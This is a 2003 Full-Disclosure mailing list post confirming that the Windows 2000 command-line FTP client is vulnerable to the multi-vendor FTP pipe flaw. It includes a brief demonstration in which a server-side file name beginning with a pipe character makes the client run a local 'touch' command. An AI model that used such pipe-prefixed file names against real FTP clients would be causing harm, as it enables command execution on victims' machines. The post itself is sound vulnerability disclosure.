Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Multiple Vendor FTP pipe Vulnerability

From: SChoe <schoe () oicinc com>
Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
Securityfocus has a post on its website regarding this vulnerability in
many ftp clients.  I've tested and subsequently validated this issue on
many of the platforms mentioned in their advisory.  They mention
that the Netscape client on Windows 2000 Professional, but fails to
mention that the commandline ftp client included with win2k (server and
pro) are also vulnerable.

<-----------------------snip----------------------->
# Create file on ftp server for download by client.
schoe@ftp:/home/ftp$ touch \|touch\ file

# Start commandline ftp client on win2k.
Microsoft Windows 2000 [Version 5.00.2195]
<C> Copyright 1985-2000 Microsoft Corp.

C:\ ftp ftp.xxxx.com
....
ftp> get "|touch file.txt"
...
ftp> quit
221 Goodbye.

# "C:\file.txt" should now exist.
<-----------------------snap----------------------->

Multiple Vendor VTP pipe Vulnerability
======================================
www.securityfocus.com/bid/396/info

.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer  |
.-------------------------------------------.---.
            | Oceanic Imaging Consultants, Inc. |
            | Phone #: (808) 539.3634           |
            .-----------------------------------.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: